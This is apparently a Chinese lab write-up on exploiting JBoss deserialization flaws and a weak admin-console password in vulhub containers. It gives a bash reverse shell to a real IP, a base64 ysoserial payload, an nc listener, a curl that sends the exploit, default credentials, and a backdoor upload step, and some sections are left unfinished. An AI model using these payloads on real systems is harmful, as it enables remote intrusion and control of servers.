CVE-2015-7501
环境搭建
cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d
过程
访问网址,存在页面说明接口存在且存在反序列化漏洞
http://8.130.17.222:8080/invoker/JMXInvokerServlet
2.下载 ysoserial ⼯具进⾏漏洞利⽤
https://github.com/frohoff/ysoserial
将反弹shell进行base64编码
bash -i >& /dev/tcp/8.130.17.222/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA= 39java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=}|{base64,-d}| {bash,-i} ">exp.ser
3.监听端口
nc -lvvp 6666
4.执行命令
curl http://121.40.229.129:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
5.受到监听后反弹成功
CVE-2017-7504
漏洞介绍
41JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的 HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码执行
环境搭建
过程
访问网站

CVE-2017-12149
漏洞介绍
该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过 滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
环境搭建
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
过程
访问网站
访问这个网站http://8.130.17.222:8080/invoker/readonly,出现500说明存在

Administration Console弱口令
漏洞描述
环境搭建
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
密码文件
/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties
账户密码:admin:vulhub
过程
打开网站
http://8.130.17.222:8080/admin-console/login.seam
登录来到后台
点击web应用
上传后门shell压缩包
